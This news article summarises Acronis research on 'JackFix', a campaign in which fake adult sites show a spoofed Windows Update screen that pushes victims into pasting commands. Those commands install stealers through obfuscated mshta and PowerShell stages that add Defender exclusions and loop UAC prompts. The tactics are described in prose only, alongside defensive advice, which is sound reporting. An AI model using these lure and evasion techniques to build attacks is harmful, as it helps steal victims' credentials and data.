CYBERSECURITY | Fake adult sites spoof Windows Update to drop multi-stealer malware — Acronis
In a report by Acronis TRU researchers, the company describes a novel variation of so-called ClickFix attacks, in which victims are socially engineered into copying and executing attacker-supplied commands.
A new browser-based attack chain is abusing fake adult websites and a full-screen “Windows Update” page to trick users into running commands that install multiple info-stealing malware families on their PCs, according to research by Acronis Threat Research Unit (TRU).
In a report authored by Acronis TRU researcher Eliad Kimhy, the company describes a novel variation of so-called ClickFix attacks, in which victims are socially engineered into copying and executing attacker-supplied commands. The campaign combines an adult-content lure with a realistic, browser-rendered Windows Update screen that appears after the victim clicks anywhere on the fake site.
Once the victim follows the on-screen instructions, the attack chain delivers several well-known stealers and remote access tools, including recent versions of Rhadamanthys, Vidar 2.0, RedLine and Amadey, along with multiple loaders and additional payloads.
Kimhy and the Acronis TRU team refer to this screen-hijacking ClickFix method as “JackFix,” noting that it merges old-school screen-locker tactics with modern fileless and PowerShell-based malware techniques.
Adult-themed lures and a fake Windows Update screen
Unlike many ClickFix or phishing attacks that start with an email claiming an account problem or billing issue, this campaign begins with fake adult sites designed to mimic platforms such as xHamster, Pornhub and smaller “free porn” portals.
Acronis says it is highly likely that traffic to these clones originates from malvertising on shady or adult-focused websites, although the same links could also be pushed via email, private messages or forums. In some early variants, the pages display explicit images posing as playable videos. More recent versions show a blurred adult-style background with a prominent age-verification prompt and a browser notification request.
“The site itself, or in our case, the site’s subject matter, is lure enough,” Kimhy writes, pointing out that victims are not forced to visit the page but choose to click into it.
Any interaction with the fake site — clicking an age gate, a play button or even the notification pop-up — triggers JavaScript that forces the browser into full-screen mode and overlays a blue Windows Update screen. The HTML- and CSS-based page closely imitates the look of a genuine update process, including a blue background, white system-style text, a spinning “waiting” animation and percentage counters that appear to show several “Critical Windows Security Updates” being installed.
At the end of the fake update, the page displays detailed instructions that walk the victim through opening Windows’ Run dialog or PowerShell and pasting in a command provided by the attacker. This is the core of the ClickFix technique.
To increase pressure and limit escape routes, the script attempts to block common keyboard shortcuts such as Esc, F11, F12 and F5. Acronis notes that this lockout is not fully effective in current versions of major browsers, but it can still confuse or trap less experienced users, especially in the context of an adult site suddenly demanding immediate security updates.
Three-stage, heavily obfuscated attack chain
If the victim executes the supplied command, a three-stage infection flow begins.
In most cases, the first stage starts with an mshta command. Earlier versions of the campaign exposed this payload in plain text on the phishing page. Later iterations now obfuscate both the payload and the ClickFix logic using hex-encoded arrays and character-code functions, making it more difficult for defenders to detect suspicious clipboard or command strings with basic scanning.
The mshta call reaches a remote URL that typically ends with an .odd file. Initially, those files contained relatively simple JavaScript that invoked PowerShell to download another script using commands such as irm or iwr. In current samples, the .odd files are padded with junk functions and unused code, and the active payload is buried in a CharCode or Base64-encoded block at the bottom.
When contacted directly through a browser, these attacker-controlled URLs redirect to benign destinations like Google or Steam. Only when accessed via the specific PowerShell command do they return the malicious second-stage script. Acronis says this behavior helps the infrastructure avoid detection and analysis on platforms such as VirusTotal, which see only the harmless redirection.
The second-stage payload is a large, heavily obfuscated PowerShell script, often tens of thousands of characters long and in some cases reaching up to 13 MB. It contains numerous randomly named variables and functions that are never called, as well as comments that appear to mark sections of automatically generated anti-analysis code. Acronis suggests the attackers are using an obfuscation tool, and possibly even AI-generated filler code, to complicate static analysis.
Early in its execution, the script attempts to create extensive exclusions in Microsoft Defender, covering folders, file paths and even IP addresses associated with the attack. It then spawns a new PowerShell process and tries to elevate its privileges by invoking the -Verb RunAs option, which triggers Windows’ User Account Control prompt.
From the victim’s perspective, after they run the supposed security-update commands, they are bombarded with repeated UAC dialogs asking for permission to allow PowerShell to run with administrator rights. The script loops until the user clicks “Yes,” effectively making the machine difficult to use unless they comply or forcibly interrupt the process via actions such as Ctrl+Alt+Delete.
Once elevated, the second-stage script either decrypts an embedded payload — stored as a large Base64 blob and protected with XOR or AES — and loads it directly into memory, or acts as a downloader that fetches multiple executables from command-and-control servers.
In the downloader scenario, a single infection can launch up to eight distinct payloads. Acronis observed one sample that subsequently downloaded and executed 14 additional tools and malware. The researchers describe this as one of the most extreme cases of “spray and prey” they have encountered, noting that the operators may be testing different malware families and ensuring that at least one successfully evades defenses.
Strange code artifacts and defensive guidance
While tracking the campaign over several months, Acronis researchers also found unusual remnants in the phishing site’s source code.
Early versions included developer comments written in Russian, hinting that at least some of the developers are Russian-speaking. Other commented-out sections referenced a hidden Shockwave Flash component named pu.swf, suggesting that the template may have roots in older exploit kits from the pre-2020 Flash era, later updated with ClickFix logic.
More striking is a commented text block quoting a 2003 United Nations Security Council discussion about disarming armed groups during the Bougainville peace process. The snippet reads, in part: “With regard to stage III, we highly recommend the complete destruction of all weapons, as a lasting peace cannot be ensured otherwise.”
The passage is never displayed to visitors but appears consistently across recent site versions. Acronis notes that it is unclear whether this is an intentional message, an internal joke, a distraction for analysts or simply leftover code from an unknown earlier project.
Despite the oddities, the researchers emphasize that the campaign demonstrates a sophisticated blend of social engineering, browser-based deception and multi-stage, fileless execution that can cause serious damage if allowed to run fully. Compromised systems risk the theft of credentials, cryptocurrency wallets and other sensitive data, as well as potential lateral movement through RATs and loaders.
Acronis says its XDR platform blocks the attack once the malicious PowerShell script executes, preventing later stages from deploying additional malware.
For security teams, Acronis recommends renewed user education focused on any scenario where users are asked to paste commands into PowerShell, cmd or the Run dialog, even when the surrounding interface looks like a legitimate Windows component. Organizations should also consider restricting or monitoring PowerShell, cmd and mshta usage for users who do not need these tools, and should focus on detecting suspicious command-line activity and fileless malware techniques.
By reviving the psychology of early screen-locker malware and combining it with modern ClickFix methods and adult-content lures, the “JackFix” campaign underscores how attackers c
————————————————————————-
WATCH TECHSABADO ON OUR YOUTUBE CHANNEL:
WATCH OUR OTHER YOUTUBE CHANNELS:
PLEASE LIKE our FACEBOOK PAGE and SUBSCRIBE to OUR YOUTUBE CHANNEL.
PLEASE LIKE our FACEBOOK PAGE and SUBSCRIBE to OUR YOUTUBE CHANNEL.
ontinue evolving proven tricks into more flexible and convincing social-engineering tools.
